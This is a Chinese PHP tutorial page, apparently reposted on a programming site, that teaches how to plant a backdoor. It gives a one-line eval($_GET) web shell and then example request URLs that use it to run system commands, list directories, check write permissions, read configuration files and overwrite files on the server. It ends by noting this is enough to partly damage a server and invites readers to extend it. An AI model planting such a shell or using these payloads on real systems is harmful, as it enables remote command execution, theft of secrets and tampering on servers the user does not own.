首页 >后端开发 >php教程 > 正文

PHP后门的一些用法

转载2019-08-29 17:58:1204583
今天我们说一些最常见的PHP留后门的一些用法

首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就这样,你已经获得了这台服务器上的很多执行权限。

那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

以上就是PHP后门的一些用法的详细内容,更多请关注php中文网其它相关文章!

php中文网最新课程二维码

声明:本文转载于:aliyun,如有侵犯,请联系admin@php.cn删除

  • 相关标签:PHP后门
  • 相关文章

    相关视频


    网友评论

    文明上网理性发言,请遵守 新闻评论服务协议

    我要评论
  • 专题推荐

    推荐视频教程
  • PHP经典算法面试题PHP经典算法面试题
  • php7实战开发cms内容管理系统php7实战开发cms内容管理系统
  • ThinkPHP6.0极速入门(视频教程)ThinkPHP6.0极速入门(视频教程)
  • ThinkPHP6.0公益直播课ThinkPHP6.0公益直播课
  • 视频教程分类